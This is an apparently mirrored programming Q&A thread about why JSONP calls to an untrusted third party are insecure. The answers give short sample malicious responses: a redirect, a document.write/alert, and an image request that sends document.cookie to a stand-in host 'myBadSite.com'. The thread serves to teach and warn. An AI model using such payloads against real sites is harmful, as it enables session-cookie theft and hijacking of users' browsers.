CODEWITHSUNDEEP
jqueryjsonsecurityjsonp
Alec Smart
Alec Smart

Reputation: 95900

jQuery JSONP Security

Am trying to convince a team that using jQuery JSONP call with a untrusted third-party might be insecure. Am using standard jQuery code:

$.ajax({
    url:unsecureserver+"?json_callback=?",
    dataType:'jsonp'
    success:function(data) {
        // doing processing here
    }
});

I need some help on what kind of insecure data to return which could cause issues; e.g. show an alert message. e.g. a JSON statement like:

 { "success": true } alert('hi');

Any suggestions what I should replace the above with so that it works with jQuery?

Upvotes: 1

Views: 612

Answers (3)

SilverlightFox
SilverlightFox

Reputation: 33538

JSONP is not called from an $.ajax call, but it is included in the page like so:

<script src="http://external-server.example.com/getNames?callback=foo"></script>

Including a <script> tag pointing to an external domain is basically giving full trust to that domain as any script code returned will execute in the context of your domain, giving the external resource full access to your DOM. The script can do what it likes and access any non Http Only cookie values or it could redirect the user away.

Drop in this code to your test external server:

document.location.href = 'http://www.google.com/';

and access via the script tag and the user would be directed away from your site.

Upvotes: 1

Royi Namir
Royi Namir

Reputation: 148524

need some help on what kind of insecure data to return which could cause issues

I will start with this :

There is no difference between jsonp way of working and <Script src='whatever'> </script>

Now , use your imagination what are the pitfalls.

BAsically the third party should return something like myCallback({"data":"1"});

But he can also send something like : : 

createElement('Img');
Img.src='http://myBadSite.com/ImgHandler'+document.cookie // that's where httponly is entering

jsonp is a data padded with method call. BUT

content type is application/javascript; !!!!! which means - he can run what ever he wants...

look at this sample : http://jsbin.com/IMaKUQId/3/edit

enter image description here

edit :

He can send you this also :

myCallback(function (){get the sh** from this browser }());

p.s. If you should convince him about this , he probably have a lot to learn.

Upvotes: 2

Rovak
Rovak

Reputation: 778

JSON includes a javascript file using the script tag and the response should include a function which is named after the json_callback parameter. This means that any code can be run. With the following call:

$.ajax({
    url:unsecureserver+"?json_callback=callback",
    dataType:'jsonp'
    success:function(data) {
        // doing processing here
    }
});

The response which may contain insecure code:

document.write('evil content');
alert('hi');
callback({ "success": true });

Upvotes: 3

Related Questions